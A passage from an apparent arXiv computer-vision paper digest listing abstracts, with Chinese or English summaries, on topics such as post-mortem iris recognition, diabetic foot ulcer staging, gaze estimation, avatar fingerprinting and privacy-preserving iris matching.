【速读】:该论文旨在解决法医虹膜识别(forensic iris recognition)领域中因尸体虹膜图像数据稀缺、采集困难以及缺乏专门针对死亡后虹膜图像比对方法所导致的进展受限问题。其关键解决方案包括:首先,构建了一个包含259名受试者、最大尸僵时间(PMI)达1674小时的新型近红外(NIR)与可见光虹膜图像数据集,并首次公开了同一受试者生前与死后均采集的数据;其次,将该数据集与现有公开的尸体虹膜样本融合,利用五种虹膜识别算法在338名死者样本上评估当前自动法医虹膜识别的性能,并分析人口统计学因素对识别效果的影响;第三,提出一种用于检测尸体虹膜图像的模型,将其视为“呈现攻击”(presentation attacks)进行处理;最后,开发了一个开源法医工具,集成三种尸体虹膜识别方法并加入可解释性模块,提升比对过程的人类可理解性。
链接: https://arxiv.org/abs/2603.26976
作者: Rasel Ahmed Bhuiyan,Parisa Farmanifard,Renu Sharma,Andrey Kuehlkamp,Aidan Boyd,Patrick J Flynn,Kevin W Bowyer,Arun Ross,Dennis Chute,Adam Czajka
机构: University of Notre Dame (圣母大学); Michigan State University (密歇根州立大学); Meta (Meta); Dutchess County Medical Examiner’s Office (达奇县法医办公室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Post-mortem iris recognition brings both hope to the forensic community (a short-term but accurate and fast means of verifying identity) as well as concerns to society (its potential illicit use in post-mortem impersonation). These hopes and concerns have grown along with the volume of research in post-mortem iris recognition. Barriers to further progress in post-mortem iris recognition include the difficult nature of data collection, and the resulting small number of approaches designed specifically for comparing iris images of deceased subjects. This paper makes several unique contributions to mitigate these barriers. First, we have collected and we offer a new dataset of NIR (compliant with ISO/IEC 19794-6 where possible) and visible-light iris images collected after demise from 259 subjects, with the largest PMI (post-mortem interval) being 1,674 hours. For one subject, the data has been collected before and after death, the first such case ever published. Second, the collected dataset was combined with publicly-available post-mortem samples to assess the current state of the art in automatic forensic iris recognition with five iris recognition methods and data originating from 338 deceased subjects. These experiments include analyses of how selected demographic factors influence recognition performance. Thirdly, this study implements a model for detecting post-mortem iris images, which can be considered as presentation attacks. Finally, we offer an open-source forensic tool integrating three post-mortem iris recognition methods with explainability elements added to make the comparison process more human-interpretable.
[CV-240] Multimodal Deep Learning for Diabetic Foot Ulcer Staging Using Integrated RGB and Thermal Imaging
【速读】:该论文旨在解决糖尿病足溃疡(Diabetic Foot Ulcer, DFU)分期分类的准确性问题,以期通过早期精准诊断降低截肢风险和医疗负担。其解决方案的关键在于开发了一种基于树莓派(Raspberry Pi)的便携式多模态成像系统,能够同步采集RGB图像与热红外图像,并构建包含1,205个样本的标注数据集(分为六类DFU阶段)。实验对比了仅使用RGB、仅使用热成像以及将热图作为第四通道融合RGB与热成像的多模态训练策略,在多个深度学习模型(DenseNet121、EfficientNetV2、InceptionV3、ResNet50、VGG16)中验证发现:融合RGB与热成像的多模态输入显著优于单一模态方法,其中VGG16模型在RGB+Thermal数据上表现最优,准确率达93.25%,F1-score为92.53%,MCC为91.03%;Grad-CAM热力图进一步表明,热通道有助于模型聚焦于温度异常区域,而RGB通道提供结构与纹理信息,二者协同提升了判别能力。
链接: https://arxiv.org/abs/2603.26952
作者: Gulengul Mermer,Mustafa Furkan Aksu,Gozde Ozsezer,Sevki Cetinkalp,Orhan Er,Mehmet Kemal Gullu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 18 pages, 7 figures
Abstract:Diabetic foot ulcers (DFU) are one of the serious complications of diabetes that can lead to amputations and high healthcare costs. Regular monitoring and early diagnosis are critical for reducing the clinical burden and the risk of amputation. The aim of this study is to investigate the impact of using multimodal images on deep learning models for the classification of DFU stages. To this end, we developed a Raspberry Pi-based portable imaging system capable of simultaneously capturing RGB and thermal images. Using this prototype, a dataset consisting of 1,205 samples was collected in a hospital setting. The dataset was labeled by experts into six distinct stages. To evaluate the models’ performance, we prepared three different training sets: RGB-only, thermal-only, and RGB+Thermal (with the thermal image added as a fourth channel). We trained these training sets on the DenseNet121, EfficientNetV2, InceptionV3, ResNet50, and VGG16 models. The results show that the multimodal training dataset, in which RGB and thermal data are combined across four channels, outperforms single-modal approaches. The highest performance was observed in the VGG16 model trained on the RGB+Thermal dataset. The model achieved an accuracy of 93.25%, an F1-score of 92.53%, and an MCC of 91.03%. Grad-CAM heatmap visualizations demonstrated that the thermal channel helped the model focus on the correct location by highlighting temperature anomalies in the ulcer region, while the RGB channel supported the decision-making process with complementary structural and textural information.
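文中"将热图作为第四通道"的多模态输入构造方式可示意如下(224×224 尺寸与随机数据均为假设;实际训练时还需将网络第一层卷积的输入通道从 3 改为 4,并保证 RGB 与热图像素级对齐):

```python
import numpy as np

rng = np.random.default_rng(0)
# 假设:一张已对齐的 224x224 RGB 图像和单通道热图(随机数仅作演示)
rgb = rng.random((224, 224, 3)).astype(np.float32)
thermal = rng.random((224, 224, 1)).astype(np.float32)

# 沿通道维拼接:RGB 三通道 + 热成像一通道 -> 四通道输入
fused = np.concatenate([rgb, thermal], axis=-1)
print(fused.shape)  # (224, 224, 4)
```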
[CV-241] Real-time Appearance-based Gaze Estimation for Open Domains
【速读】:该论文旨在解决基于外观的瞳孔注视估计(Appearance-based Gaze Estimation, AGE)在受限场景下表现优异,但在实际非约束环境中(如佩戴面部可穿戴设备或光照不良)泛化能力显著下降的问题。核心挑战在于训练数据图像多样性不足以及跨数据集标签一致性差,尤其是在俯仰角(pitch axis)方向上存在显著偏差。解决方案的关键在于两个方面:其一,通过集成多种增强技术(如合成眼镜、口罩和不同光照条件)扩展图像流形以提升模型鲁棒性;其二,将 gaze 回归重构为多任务学习框架,引入多视角监督对比学习(multi-view supervised contrastive learning)、离散化标签分类和眼部区域分割作为辅助目标,从而缓解因数据分布差异导致的标签偏差问题。该方法无需额外人工标注数据即可实现高性能、轻量化的实时注视追踪,优于现有主流方法且参数量不足其1%。
链接: https://arxiv.org/abs/2603.26945
作者: Zhenhao Li,Zheng Liu,Seunghyun Lee,Amin Fadaeinejad,Yuanhao Yu
机构: Huawei Technologies Canada (华为技术加拿大); University of Toronto (多伦多大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Appearance-based gaze estimation (AGE) has achieved remarkable performance in constrained settings, yet we reveal a significant generalization gap where existing AGE models often fail in practical, unconstrained scenarios, particularly those involving facial wearables and poor lighting conditions. We attribute this failure to two core factors: limited image diversity and inconsistent label fidelity across different datasets, especially along the pitch axis. To address these, we propose a robust AGE framework that enhances generalization without requiring additional human-annotated data. First, we expand the image manifold via an ensemble of augmentation techniques, including synthesis of eyeglasses, masks, and varied lighting. Second, to mitigate the impact of anisotropic inter-dataset label deviation, we reformulate gaze regression as a multi-task learning problem, incorporating multi-view supervised contrastive (SupCon) learning, discretized label classification, and eye-region segmentation as auxiliary objectives. To rigorously validate our approach, we curate new benchmark datasets designed to evaluate gaze robustness under challenging conditions, a dimension largely overlooked by existing evaluation protocols. Our MobileNet-based lightweight model achieves generalization performance competitive with the state-of-the-art (SOTA) UniGaze-H, while utilizing less than 1% of its parameters, enabling high-fidelity, real-time gaze tracking on mobile devices.
[CV-242] From 3D Pose to Prose: Biomechanics-Grounded Vision–Language Coaching
【速读】:该论文旨在解决健身教练系统在实时视频流中缺乏精准、个性化动作反馈的问题,尤其是在识别运动阶段和纠正姿势错误时存在语义模糊与生物力学不一致的局限。解决方案的关键在于提出BioCoach框架,其核心创新是融合视觉外观与三维骨骼运动学(3D skeletal kinematics),通过三阶段流程实现:首先利用特定于运动的自由度选择器聚焦关键关节;其次构建结构化的生物力学上下文,结合个体形态参数与周期性约束分析;最后采用视觉-生物力学条件化反馈模块,借助交叉注意力机制生成精确且可操作的文本建议。该方法通过参数高效训练冻结视觉与语言主干网络,确保透明、个性化的推理而非单纯模式匹配,显著提升了反馈准确性与时序触发能力。
链接: https://arxiv.org/abs/2603.26938
作者: Yuyang Ji,Yixuan Shen,Shengjie Zhu,Yu Kong,Feng Liu
机构: Drexel University (德雷塞尔大学); Michigan State University (密歇根州立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present BioCoach, a biomechanics-grounded vision–language framework for fitness coaching from streaming video. BioCoach fuses visual appearance and 3D skeletal kinematics, through a novel three-stage pipeline: an exercise-specific degree-of-freedom selector that focuses analysis on salient joints; a structured biomechanical context that pairs individualized morphometrics with cycle and constraint analysis; and a vision–biomechanics conditioned feedback module that applies cross-attention to generate precise, actionable text. Using parameter-efficient training that freezes the vision and language backbones, BioCoach yields transparent, personalized reasoning rather than pattern matching. To enable learning and fair evaluation, we augment QEVD-fit-coach with biomechanics-oriented feedback to create QEVD-bio-fit-coach, and we introduce a biomechanics-aware LLM judge metric. BioCoach delivers clear gains on QEVD-bio-fit-coach across lexical and judgment metrics while maintaining temporal triggering; on the original QEVD-fit-coach, it improves text quality and correctness with near-parity timing, demonstrating that explicit kinematics and constraints are key to accurate, phase-aware coaching.
[CV-243] Leveraging Avatar Fingerprinting: A Multi-Generator Photorealistic Talking-Head Public Database and Benchmark
Quick Read: This paper addresses the reliability of avatar fingerprinting for photorealistic generative-AI talking-head avatars across platforms and generators, i.e., determining whether two avatar videos are driven by the same human operator. Current public databases lack the diversity and realism needed to evaluate fingerprinting systems in modern multi-generator settings. The key to the solution is AVAPrintDB, a new public multi-generator talking-head avatar database covering generators from three mainstream synthesis paradigms (GAGAvatar, LivePortrait, HunyuanPortrait) and including both self-reenactment and cross-reenactment scenarios to simulate legitimate use and impersonation; the authors further define a standardized, reproducible benchmark protocol and explore novel fingerprinting methods based on Foundation Models (DINOv2 and CLIP). Experiments show that although identity-related motion cues remain robust in synthetic avatars, existing systems are still highly sensitive to the specific synthesis pipeline and source domain, underscoring the need for future work on generalization.
Link: https://arxiv.org/abs/2603.26934
Authors: Laura Pedrouzo-Rodriguez, Luis F. Gomez, Ruben Tolosana, Ruben Vera-Rodriguez, Roberto Daza, Aythami Morales, Julian Fierrez
Affiliations: BiometricsAI; Universidad Autónoma de Madrid
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Recent advances in photorealistic avatar generation have enabled highly realistic talking-head avatars, raising security concerns regarding identity impersonation in AI-mediated communication. To advance in this challenging problem, the task of avatar fingerprinting aims to determine whether two avatar videos are driven by the same human operator or not. However, current public databases in the literature are scarce and based solely on old-fashioned talking-head avatar generators, not representing realistic scenarios for the current task of avatar fingerprinting. To overcome this situation, the present article introduces AVAPrintDB, a new publicly available multi-generator talking-head avatar database for avatar fingerprinting. AVAPrintDB is constructed from two audiovisual corpora and three state-of-the-art avatar generators (GAGAvatar, LivePortrait, HunyuanPortrait), representing different synthesis paradigms, and includes both self- and cross-reenactments to simulate legitimate usage and impersonation scenarios. Building on this database, we also define a standardized and reproducible benchmark for avatar fingerprinting, considering public state-of-the-art avatar fingerprinting systems and exploring novel methods based on Foundation Models (DINOv2 and CLIP). Also, we conduct a comprehensive analysis under generator and dataset shift. Our results show that, while identity-related motion cues persist across synthetic avatars, current avatar fingerprinting systems remain highly sensitive to changes in the synthesis pipeline and source domain. The AVAPrintDB, benchmark protocols, and avatar fingerprinting systems are publicly available to facilitate reproducible research.
[CV-244] Live Interactive Training for Video Segmentation CVPR2026
Quick Read: This paper tackles the inefficiency of user intervention in interactive video segmentation: state-of-the-art models such as SAM2 apply user corrections only as immediate fixes without learning from them, so challenging scenarios (occlusion, object separation, camouflage, etc.) demand many repeated manual corrections. The key to the solution is a new framework called Live Interactive Training (LIT), which lets the vision system learn online from user corrections during inference; concretely, the LIT-LoRA instantiation updates a lightweight LoRA (Low-Rank Adaptation) module on the fly, rapidly fine-tuning the model after each correction with only about 0.5 s of overhead, thereby improving segmentation on subsequent frames. Experiments show an average 18-34% reduction in total corrections on challenging benchmarks, validating live adaptation as a way to cut redundant human effort.
Link: https://arxiv.org/abs/2603.26929
Authors: Xinyu Yang, Haozheng Yu, Yihong Sun, Bharath Hariharan, Jennifer J. Sun
Affiliations: Cornell University
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: CVPR 2026
Abstract:Interactive video segmentation often requires many user interventions for robust performance in challenging scenarios (e.g., occlusions, object separations, camouflage, etc.). Yet, even state-of-the-art models like SAM2 use corrections only for immediate fixes without learning from this feedback, leading to inefficient, repetitive user effort. To address this, we introduce Live Interactive Training (LIT), a novel framework for prompt-based visual systems where models also learn online from human corrections at inference time. Our primary instantiation, LIT-LoRA, implements this by continually updating a lightweight LoRA module on-the-fly. When a user provides a correction, this module is rapidly trained on that feedback, allowing the vision system to improve performance on subsequent frames of the same video. Leveraging the core principles of LIT, our LIT-LoRA implementation achieves an average 18-34% reduction in total corrections on challenging video segmentation benchmarks, with a negligible training overhead of ~0.5s per correction. We further demonstrate its generality by successfully adapting it to other segmentation models and extending it to CLIP-based fine-grained image classification. Our work highlights the promise of live adaptation to transform interactive tools and significantly reduce redundant human effort in complex visual tasks. Project: this https URL.
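The on-the-fly adapter update at the heart of LIT-LoRA can be sketched with plain numpy: a frozen weight matrix plus a low-rank correction W + (alpha/r)·BA, where only the small factors are nudged toward each user correction. The dimensions, learning rate, and squared-error objective below are illustrative assumptions, not the paper's settings.

```python
import numpy as np

rng = np.random.default_rng(0)

# Frozen backbone weight: never touched during live adaptation.
d_out, d_in, r, alpha = 8, 8, 2, 4.0
W = rng.standard_normal((d_out, d_in))

# Lightweight LoRA factors; B is zero-initialized so the adapter starts
# as a no-op and only departs from it as corrections arrive.
A = 0.1 * rng.standard_normal((r, d_in))
B = np.zeros((d_out, r))

def forward(x, B):
    """Frozen weight plus the low-rank correction, scaled by alpha/r."""
    return W @ x + (alpha / r) * (B @ (A @ x))

x = rng.standard_normal(d_in)          # features of the corrected frame
y_target = rng.standard_normal(d_out)  # stands in for the user's correction

# A few SGD steps on B alone (squared error), as a stand-in for the rapid
# ~0.5 s per-correction update described in the paper.
lr = 0.1
for _ in range(50):
    grad_y = 2.0 * (forward(x, B) - y_target)          # dLoss/dy
    B -= lr * (alpha / r) * np.outer(grad_y, A @ x)    # chain rule to B

err0 = np.linalg.norm(forward(x, np.zeros_like(B)) - y_target)
err1 = np.linalg.norm(forward(x, B) - y_target)
print(err1 < err0)  # True: the adapter reduced error on the corrected sample
```

Because only B and A carry gradients, the per-correction update touches a tiny fraction of the parameters, which is what keeps the overhead small.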
[CV-245] FusionAgent: A Multimodal Agent with Dynamic Model Selection for Human Recognition CVPR2026
Quick Read: This paper addresses the inefficiency and limited robustness of static model-fusion strategies in whole-body human recognition, which invoke every model for every test sample regardless of sample quality or modality reliability, wasting resources and handling complex scenarios poorly. The key to the solution is the FusionAgent framework, with two core innovations: 1) a Multimodal Large Language Model (MLLM) acts as an agent that, through Reinforcement Fine-Tuning (RFT) with a metric-based reward, performs dynamic, per-sample adaptive model selection; 2) an Anchor-based Confidence Top-k (ACT) score-fusion mechanism anchors on the most confident model and integrates complementary predictions in a confidence-aware manner, mitigating score misalignment and embedding heterogeneity across models. Experiments on multiple whole-body biometric benchmarks show clear gains over state-of-the-art methods with fewer model invocations, improving the efficiency, interpretability, and robustness of recognition systems.
Link: https://arxiv.org/abs/2603.26908
Authors: Jie Zhu, Xiao Guo, Yiyang Su, Anil Jain, Xiaoming Liu
Affiliations: Michigan State University; University of North Carolina at Chapel Hill
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: CVPR 2026
Abstract:Model fusion is a key strategy for robust recognition in unconstrained scenarios, as different models provide complementary strengths. This is especially important for whole-body human recognition, where biometric cues such as face, gait, and body shape vary across samples and are typically integrated via score-fusion. However, existing score-fusion strategies are usually static, invoking all models for every test sample regardless of sample quality or modality reliability. To overcome these limitations, we propose FusionAgent, a novel agentic framework that leverages a Multimodal Large Language Model (MLLM) to perform dynamic, sample-specific model selection. Each expert model is treated as a tool, and through Reinforcement Fine-Tuning (RFT) with a metric-based reward, the agent learns to adaptively determine the optimal model combination for each test input. To address the model score misalignment and embedding heterogeneity, we introduce Anchor-based Confidence Top-k (ACT) score-fusion, which anchors on the most confident model and integrates complementary predictions in a confidence-aware manner. Extensive experiments on multiple whole-body biometric benchmarks demonstrate that FusionAgent significantly outperforms SoTA methods while achieving higher efficiency through fewer model invocations, underscoring the critical role of dynamic, explainable, and robust model fusion in real-world recognition systems. Project page: this https URL.
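The paper does not spell out the ACT formula, so the following is only a hypothetical sketch of the stated idea: anchor on the most confident expert, keep the top-k experts by confidence, align their score scales, and average with confidence weights. All numbers, and the z-normalization used for score alignment, are assumptions for illustration.

```python
import numpy as np

# Hypothetical per-probe outputs: each expert (face, gait, body shape)
# returns similarity scores over 4 gallery identities plus a confidence.
scores = np.array([
    [0.9, 0.1, 0.2, 0.3],   # face expert
    [0.4, 0.5, 0.3, 0.2],   # gait expert
    [0.7, 0.2, 0.4, 0.1],   # body-shape expert
])
conf = np.array([0.95, 0.30, 0.60])

def act_fuse(scores, conf, k=2):
    """Toy anchor-and-top-k fusion: not the paper's exact ACT formula."""
    top = np.argsort(conf)[::-1][:k]    # k most confident experts
    anchor = int(top[0])                # most confident one is the anchor
    # Align each selected expert's score scale (per-row z-norm), then
    # average with confidence weights.
    z = (scores[top] - scores[top].mean(axis=1, keepdims=True)) \
        / scores[top].std(axis=1, keepdims=True)
    w = conf[top] / conf[top].sum()
    fused = (w[:, None] * z).sum(axis=0)
    return anchor, fused

anchor, fused = act_fuse(scores, conf)
print(anchor, int(np.argmax(fused)))  # expert 0 is the anchor; identity 0 wins
```

The low-confidence gait expert is simply never invoked in this fusion, which mirrors the efficiency argument: dynamic selection saves the cost of unreliable experts.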
[CV-246] Computer Vision with a Superpixelation Camera
Quick Read: This paper addresses the data-redundancy problem of conventional cameras in resource-constrained settings: cameras emit data streams on the order of the number of image pixels, yet most of that information is redundant for downstream computer vision algorithms, hurting processing efficiency. The key to the solution is a novel camera design called SuperCam, which performs superpixel segmentation on the fly during capture, adaptively compressing and shaping the data stream. Experiments show that under memory constraints SuperCam outperforms state-of-the-art superpixel algorithms and yields superior outputs for image segmentation, object detection, and monocular depth estimation, offering an efficient data-processing path for deploying computer vision models on edge devices.
Link: https://arxiv.org/abs/2603.26900
Authors: Sasidharan Mahalingam, Rachel Brown, Atul Ingle
Affiliations: Portland State University; Willamette University
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Conventional cameras generate a lot of data that can be challenging to process in resource-constrained applications. Usually, cameras generate data streams on the order of the number of pixels in the image. However, most of this captured data is redundant for many downstream computer vision algorithms. We propose a novel camera design, which we call SuperCam, that adaptively processes captured data by performing superpixel segmentation on the fly. We show that SuperCam performs better than current state-of-the-art superpixel algorithms under memory-constrained situations. We also compare how well SuperCam performs when the compressed data is used for downstream computer vision tasks. Our results demonstrate that the proposed design provides superior output for image segmentation, object detection, and monocular depth estimation in situations where the available memory on the camera is limited. We posit that superpixel segmentation will play a crucial role as more computer vision inference models are deployed in edge devices. SuperCam would allow computer vision engineers to design more efficient systems for these applications.
[CV-247] Privacy-Preserving Iris Recognition: Performance Challenges and Outlook
Quick Read: This paper addresses the performance bottlenecks that privacy-preserving iris recognition systems face when using Fully Homomorphic Encryption (FHE), which hinder practical deployment in decentralized and untrusted environments. The key to the solution is a scalable privacy-preserving framework compliant with the ISO/IEC 24745 standard: the Open Iris library performs robust iris segmentation, normalization, and Gabor-filter feature extraction to produce iris codes; binary masking then removes unreliable regions, and matching is carried out on encrypted codes via Hamming distance. Experiments on the CASIA-Iris-Thousand dataset show accuracy equivalent to the cleartext baseline, but with a roughly 120,000x computational overhead per template comparison, highlighting the need for two-level architectures to make large-scale 1-N matching efficient.
Link: https://arxiv.org/abs/2603.26890
Authors: Christina Karakosta, Lian Alhedaithy, William J. Knottenbelt
Affiliations: unknown
Subjects: Cryptography and Security (cs.CR); Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Iris-based biometric identification is increasingly recognized for its significant accuracy and long-term stability compared to other biometric modalities such as fingerprints or facial features. However, all biometric modalities are highly sensitive data that raise serious privacy and security concerns, particularly in decentralized and untrusted environments. While Fully Homomorphic Encryption (FHE) has emerged as a promising solution for protecting sensitive data during computation, existing privacy-preserving iris recognition systems face significant performance limitations that hinder their practical deployment. This paper investigates the performance challenges of the current landscape of privacy-preserving iris recognition systems using FHE. Based on these insights, we outline a scalable privacy-preserving framework that aligns with all the requirements specified in the ISO/IEC 24745 standard. Leveraging the Open Iris library, our approach starts with robust iris segmentation, followed by normalization and feature extraction using Gabor filters to generate iris codes. We then apply binary masking to filter out unreliable regions and perform matching using Hamming distance on encrypted iris codes. The accuracy and performance of our proposed privacy-preserving framework is evaluated on the CASIA-Iris-Thousand dataset. Results show that our privacy-preserving framework yields very similar accuracy to the cleartext equivalent, but a much higher computational overhead with respect to pairwise iris template comparisons, of ~120,000x. This points towards the need for the deployment of two-level schemes in the context of scalable 1-N template comparisons.
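The cleartext version of the matching step is the standard masked iris-code comparison: a fractional Hamming distance computed only over bits that both masks mark as reliable. Under FHE the same XOR-and-count structure is evaluated on encrypted codes; the sketch below (toy 8-bit codes) shows the cleartext arithmetic only.

```python
import numpy as np

def masked_hamming(code_a, mask_a, code_b, mask_b):
    """Fractional Hamming distance over bits that both masks mark reliable
    (the standard iris-code comparison, here in cleartext)."""
    valid = mask_a & mask_b
    n = valid.sum()
    if n == 0:
        return 1.0  # no reliable overlap: treat as maximally distant
    return float(((code_a ^ code_b) & valid).sum()) / float(n)

a = np.array([1, 0, 1, 1, 0, 0, 1, 0], dtype=np.uint8)
b = np.array([1, 0, 0, 1, 0, 1, 1, 0], dtype=np.uint8)
ma = np.array([1, 1, 1, 1, 1, 1, 0, 0], dtype=np.uint8)  # eyelid occludes tail
mb = np.array([1, 1, 1, 1, 1, 1, 1, 1], dtype=np.uint8)

d = masked_hamming(a, ma, b, mb)
print(d)  # 2 disagreements over 6 valid bits -> 0.333...
```

Real iris codes run to thousands of bits, which is exactly why the encrypted XOR/popcount becomes the ~120,000x bottleneck the paper measures.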
[CV-248] E-CAM: Built-in Class Activation Maps for Test-Time Explainability in Pretrained Black-Box CNNs
Quick Read: This paper addresses the opacity of convolutional neural networks (CNNs) in medical image analysis, which limits their adoption in high-stakes clinical settings despite excellent performance. Existing approaches face a fundamental trade-off: post-hoc methods give unfaithful approximate explanations, while inherently interpretable architectures guarantee faithfulness but often sacrifice predictive performance. The key to the proposed solution, TTE-CAM (Test-Time Explainable CAM), is to replace a pretrained CNN's classification head at test time with a convolution-based module initialized from the original weights, converting the black box into a self-explainable model that preserves the original predictive performance while delivering faithful built-in explanations competitive with post-hoc methods.
Link: https://arxiv.org/abs/2603.26885
Authors: Kerol Djoumessi, Philipp Berens
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: Unlocking Test-Time Explainability from Pretrained Black-Box CNNs
Abstract:Convolutional neural networks (CNNs) achieve state-of-the-art performance in medical image analysis yet remain opaque, limiting adoption in high-stakes clinical settings. Existing approaches face a fundamental trade-off: post-hoc methods provide unfaithful approximate explanations, while inherently interpretable architectures are faithful but often sacrifice predictive performance. We introduce TTE-CAM, a test-time framework that bridges this gap by converting pretrained black-box CNNs into self-explainable models via a convolution-based replacement of their classification head, initialized from the original weights. The resulting model preserves black-box predictive performance while delivering built-in faithful explanations competitive with post-hoc methods, both qualitatively and quantitatively. The code is available at this https URL
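The idea of reusing the classification head's weights over the final feature maps goes back to the classic class activation map (CAM): for a GAP-then-linear head, the class logit equals the spatial mean of a map formed with the same weights, so spatial evidence can be exposed without changing the prediction. A minimal numpy illustration of that identity (TTE-CAM's convolution-based head replacement is more involved than this):

```python
import numpy as np

rng = np.random.default_rng(1)
K, H, W_, C = 4, 5, 5, 3          # feature channels, spatial size, classes
feats = rng.random((K, H, W_))    # final conv feature maps f_k(x, y)
w = rng.random((C, K))            # linear head weights w_{c,k}

# Logit for each class with global average pooling (GAP) before the head.
gap = feats.mean(axis=(1, 2))                 # (K,)
logits = w @ gap                              # (C,)

# CAM for the predicted class: weighted sum of the same feature maps.
c = int(np.argmax(logits))
cam = np.tensordot(w[c], feats, axes=1)       # (H, W)

# The explanation is faithful to the prediction by construction:
# the spatial mean of the CAM equals the class logit exactly.
print(np.isclose(cam.mean(), logits[c]))  # True
```

This equality is why initializing the new head from the original weights can keep black-box accuracy intact while making the evidence map a built-in, rather than post-hoc, quantity.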
[CV-249] LACON: Training Text-to-Image Model from Uncurated Data
Quick Read: This paper questions the current over-reliance on heavily filtered high-quality data for training text-to-image models, i.e., the filter-first paradigm that discards low-quality raw data on the assumption that it harms model performance. The key to the solution is the LACON (Labeling-and-Conditioning) framework: instead of discarding uncurated data, it re-purposes quality signals (such as aesthetic scores and watermark probabilities) as learnable condition labels and explicitly models the full distribution from low- to high-quality data, letting the generative model learn the quality boundary and improve overall generation. Under the same compute budget, LACON outperforms baselines trained only on filtered data, demonstrating the untapped value of uncurated data.
Link: https://arxiv.org/abs/2603.26866
Authors: Zhiyang Liang, Ziyu Wan, Hongyu Liu, Dong Chen, Qiu Shen, Hao Zhu, Dongdong Chen
Affiliations: Nanjing University; Microsoft Research; HKUST
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments:
Abstract:The success of modern text-to-image generation is largely attributed to massive, high-quality datasets. Currently, these datasets are curated through a filter-first paradigm that aggressively discards low-quality raw data based on the assumption that it is detrimental to model performance. Is the discarded bad data truly useless, or does it hold untapped potential? In this work, we critically re-examine this question. We propose LACON (Labeling-and-Conditioning), a novel training framework that exploits the underlying uncurated data distribution. Instead of filtering, LACON re-purposes quality signals, such as aesthetic scores and watermark probabilities as explicit, quantitative condition labels. The generative model is then trained to learn the full spectrum of data quality, from bad to good. By learning the explicit boundary between high- and low-quality content, LACON achieves superior generation quality compared to baselines trained only on filtered data using the same compute budget, proving the significant value of uncurated data.
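The "labeling" half of labeling-and-conditioning amounts to quantizing a continuous quality signal into discrete condition labels instead of thresholding it into keep/discard. A minimal sketch with illustrative bin edges (not the paper's):

```python
import numpy as np

# Instead of filtering out images whose aesthetic score falls below a
# cutoff, quantize the score into discrete condition labels that the
# generator is trained on; at sampling time, condition on the top bucket.
aesthetic = np.array([2.1, 4.8, 5.5, 6.9, 3.3, 7.4])
edges = np.array([3.0, 5.0, 6.5])        # -> 4 quality buckets
labels = np.digitize(aesthetic, edges)   # 0 = worst ... 3 = best

print(labels.tolist())  # [0, 1, 2, 3, 1, 3]
```

Every image, including the "bad" ones a filter would drop, contributes a training pair (image, quality label), which is how the model can learn the boundary between quality levels.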
[CV-250] Beyond Textual Knowledge - Leveraging Multimodal Knowledge Bases for Enhancing Vision-and-Language Navigation
Quick Read: This paper addresses two shortcomings of Vision-and-Language Navigation (VLN): insufficient capture of key semantic cues and inaccurate alignment with visual observations. The key to the solution is a new framework called Beyond Textual Knowledge (BTK), which fuses environment-specific textual knowledge with generative image knowledge bases to achieve more precise semantic grounding and cross-modal alignment: concretely, Qwen3-4B extracts goal-related phrases, Flux-Schnell is used to build two large-scale image knowledge bases (R2R-GP and REVERIE-GP), and BLIP-2 constructs an environment-specific textual knowledge base from panoramic views; these multimodal knowledge bases are integrated through the Goal-Aware Augmentor and Knowledge Augmentor modules, yielding significant navigation gains.
Link: https://arxiv.org/abs/2603.26859
Authors: Dongsheng Yang, Yinfeng Yu, Liejun Wang
Affiliations: Xinjiang University
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Image and Video Processing (eess.IV)
Comments: Main paper (37 pages). Accepted for publication in Information Processing and Management, Volume 63, Issue 6, September 2026, 104766
Abstract:Vision-and-Language Navigation (VLN) requires an agent to navigate through complex unseen environments based on natural language instructions. However, existing methods often struggle to effectively capture key semantic cues and accurately align them with visual observations. To address this limitation, we propose Beyond Textual Knowledge (BTK), a VLN framework that synergistically integrates environment-specific textual knowledge with generative image knowledge bases. BTK employs Qwen3-4B to extract goal-related phrases and utilizes Flux-Schnell to construct two large-scale image knowledge bases: R2R-GP and REVERIE-GP. Additionally, we leverage BLIP-2 to construct a large-scale textual knowledge base derived from panoramic views, providing environment-specific semantic cues. These multimodal knowledge bases are effectively integrated via the Goal-Aware Augmentor and Knowledge Augmentor, significantly enhancing semantic grounding and cross-modal alignment. Extensive experiments on the R2R dataset with 7,189 trajectories and the REVERIE dataset with 21,702 instructions demonstrate that BTK significantly outperforms existing baselines. On the test unseen splits of R2R and REVERIE, SR increased by 5% and 2.07% respectively, and SPL increased by 4% and 3.69% respectively. The source code is available at this https URL.
[CV-251] Dual-View Optical Flow for 4D Micro-Expression Recognition - A Multi-Stream Fusion Attention Approach
Quick Read: This paper tackles two challenges in 4D micro-expression recognition: micro-expressions are extremely brief and low-intensity, making them hard to capture, and 4D mesh data is high-dimensional and complex to process. The key to the solution is a dual-view optical flow approach that captures each micro-expression sequence from two synchronized viewpoints and computes optical flow to represent facial motion, simplifying the handling of high-dimensional mesh data. Each sequence is further decomposed into onset-apex and apex-offset phases, from which horizontal, vertical, and magnitude flow channels are extracted and fed into the Triple-Stream MicroAttNet, which combines a fusion attention module with a squeeze-and-excitation block to adaptively weight multimodal features and enhance magnitude information. The method achieves a macro-UF1 of 0.536, ranking first in the 4DMR IJCAI Workshop Challenge 2025.
Link: https://arxiv.org/abs/2603.26849
Authors: Luu Tu Nguyen, Thi Bich Phuong Man, Vu Tram Anh Khuong, Thanh Ha Le, Thi Duyen Ngo
Affiliations: VNU University of Engineering and Technology, Faculty of Information Technology, Hanoi, Vietnam
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
